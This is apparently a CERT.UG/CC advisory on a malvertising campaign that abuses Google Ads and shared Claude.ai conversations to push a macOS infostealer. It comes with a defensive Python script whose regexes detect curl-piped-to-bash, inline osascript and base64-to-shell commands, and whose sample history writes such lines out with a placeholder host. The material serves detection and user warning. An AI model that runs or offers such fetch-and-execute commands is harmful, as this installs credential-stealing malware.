Active Malvertising Campaign Abusing Google Ads and Claude.ai to Deliver Mac Infostealer
Scope: macOS Users (Targeting AI Tool Search Traffic)
Severity: High
An active malvertising campaign, discovered on May 10, 2026, abuses legitimate Google sponsored search results together with publicly shared Claude.ai conversations hosted on the real claude.ai domain, so the lure is indistinguishable from genuine content. macOS users searching for "Claude mac download" are tricked into pasting terminal commands that silently download and execute a MacSync infostealer variant, which harvests browser credentials, cookies and macOS Keychain contents (including SSH keys and saved passwords) and exfiltrates them to attacker-controlled servers. A second variant profiles the victim first, checking for Russian/CIS keyboard layouts before delivering a polymorphic second-stage payload via osascript, which complicates hash-based detection. Organizations should instruct users to navigate directly to claude.ai rather than clicking any sponsored search result, never to paste terminal commands sourced from web pages or AI chat sessions, and to obtain the Claude Code CLI exclusively from official Anthropic documentation.
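As an added triage example (not part of the CERT.UG/CC advisory), the script below flags command lines of the paste-and-run shape described above: a downloader piped straight into a shell or osascript, inline osascript execution, and base64-decoded content fed to an interpreter. The rule names, regexes and the sample shell history are constructed for this example.

```python
import re
from typing import Dict, List

# Heuristics for the "paste this into Terminal" lure described in the advisory.
# Rule names and patterns are this example's own (hypothetical), not CERT.UG/CC's.
_INTERP = r"(?:sudo\s+)?(?:sh|bash|zsh|osascript|python3?)\b"
RULES: Dict[str, "re.Pattern[str]"] = {
    # curl/wget output piped directly into a shell or osascript
    "download_piped_to_interpreter": re.compile(
        r"\b(?:curl|wget)\b[^|;]*\|\s*" + _INTERP),
    # inline AppleScript, the launcher the advisory says stage two uses
    "osascript_inline": re.compile(r"\bosascript\b\s+-e\b"),
    # base64-decoded text piped to an interpreter (hides the real command from the user)
    "base64_decoded_to_interpreter": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*" + _INTERP),
}
# zsh extended-history prefix (": <epoch>:<elapsed>;") stripped before matching
_ZSH_PREFIX = re.compile(r"^:\s*\d+:\d+;")

def classify(command: str) -> List[str]:
    """Return the names of every rule the command line matches (in rule order)."""
    return [name for name, rx in RULES.items() if rx.search(command)]

def scan(lines) -> List[Dict[str, object]]:
    """Run classify() over shell-history or EDR command-line records; keep hits only."""
    hits: List[Dict[str, object]] = []
    for lineno, raw in enumerate(lines, 1):
        command = _ZSH_PREFIX.sub("", raw.strip())
        rules = classify(command)
        if rules:
            hits.append({"lineno": lineno, "command": command, "rules": rules})
    return hits

# Constructed sample history; example.invalid is a placeholder, not a real host.
SAMPLE_HISTORY = [
    "brew install wget",
    ": 1778000000:0;curl -fsSL https://example.invalid/claude-mac.sh | bash",
    "git clone https://example.invalid/some-repo.git",
    "echo 'ZWNobyBoaQ==' | base64 -D | sh",          # decodes to: echo hi
    "osascript -e 'display dialog \"Updating...\"'",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_HISTORY):
        print(f"line {hit['lineno']}: {hit['rules']} <- {hit['command']}")
```

The osascript rule is deliberately broad and will match benign automation, so treat its hits as leads for review rather than verdicts.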
The Uganda National CERT and Coordination Center (CERT.UG/CC) encourages users and administrators to review the recommendations and apply the necessary updates.